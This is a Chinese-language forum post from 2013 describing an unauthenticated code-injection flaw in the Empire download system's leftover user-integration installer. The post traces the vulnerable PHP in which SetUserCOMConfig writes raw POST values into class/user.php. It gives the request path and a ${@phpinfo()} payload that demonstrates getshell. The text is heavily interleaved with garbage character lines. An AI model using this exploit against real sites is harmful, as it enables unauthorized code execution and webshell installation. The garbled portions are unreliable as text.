这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们 a5 _% W* K7 q1 F& h9 n! M
4 u p5 x7 w6 {6 F
& ~; S! F9 N _- Q8 a( O这是帝国的一套下载系统 如图
: I# r2 o% M* g: M% d7 w" Pps(不需要任何账户和密码,直接写shell)
- `' E, v# R0 P. g& C& j- V I6 J
由于很多站是由于下载要整合discuz 等等一些论坛....
0 H7 E8 L; e; V) m' @
( G6 b; G9 }0 ] `1 }2 H r而帝国他又有一个万能接口,如图
; ^6 i+ r, N+ ]. ~9 h0 F) @2 h2 e- a/ L% ?& T! g- d+ R" n! b |6 A
2 s) ~9 n! F- S
而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
6 z; `! ^) B3 T- i# }! M1 x- b8 D; D7 w& j
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
/ O5 b W o: {4 N M! t( C, e3 s: n# C
在data/fun.php中的15行
' z. _: ^8 r3 q4 f8 @* V8 M% ^! ]7 b6 e2 V7 \3 U) T0 t
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {3 H$ g9 P: b9 X& |* W# m
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
9 q% a- R0 L# b4 e" K1 c: C' s7 G. I' F
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);) [$ |0 f" ]+ k, t' C
8 s) Z9 G* s% w他将传进来的变量进行了切割,然后赋给了$filetext4 e0 j# t4 S% h/ a- }
. O! v- Z* w7 E9 J$ i' d然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了3 y, e: H- V* w. J8 s' j" ^: G
, V8 m4 e% c1 V% O/ C" h1 c9 a我们看看写入的结果,随便填一个
. R1 g2 A$ L2 a9 b, d1 r' l- q, w8 K
' I5 x. n4 a: H( b1 C& F8 i. I1 f6 f1 T; o, M0 ?( f# M
: M j3 q8 Q+ O3 c
% C/ L+ Q5 {* f7 ~1 [
3 m% M# f, B% U& L3 m0 m
4 X7 q, z9 U8 W% Z
2 d0 z+ v( J8 k+ e
9 P/ b/ ^+ Q1 n! o! \ Z
$ R: ^$ O5 A- W% f# q/ g' d& {
/ T$ b) o' C, @$ c' N8 y7 d* e
9 c9 t1 a, k M( A& M
& [0 _/ B; q5 X
3 o( t; q/ J$ u g$ f/ ^$ l: I4 O3 }" Z; z0 S
5 G3 E: k+ h/ A) C4 [
# y& c0 |% y; f; l9 J' @7 w' _3 J$ _$ R# X% l: A+ R4 k
& A3 M; v* i) o- I j# O
3 g! c2 j; r- B8 K8 E |' G+ b
( Z4 K( y1 z9 x" O4 s! A% B, s& x所以我们淫荡点,写个${@phpinfo()}试试 ) Y/ Y4 P7 Q9 b2 z' T
然后访问以下class/user.php这个文件
! z1 s9 k% @& T; O) s1 u9 k日了吧 * s( G. D9 X+ z" J( M4 j) c/ R
- L/ Q7 u/ x5 j& `: j8 o% X% n/ u* Z$ w$ n: `
% h: t, J' P1 r2 e! H# x
4 }, p7 A9 b! J
$ X; O% M; N; ?* M7 A | 
发表于 2013-1-23 09:34:37
收藏
支持
反对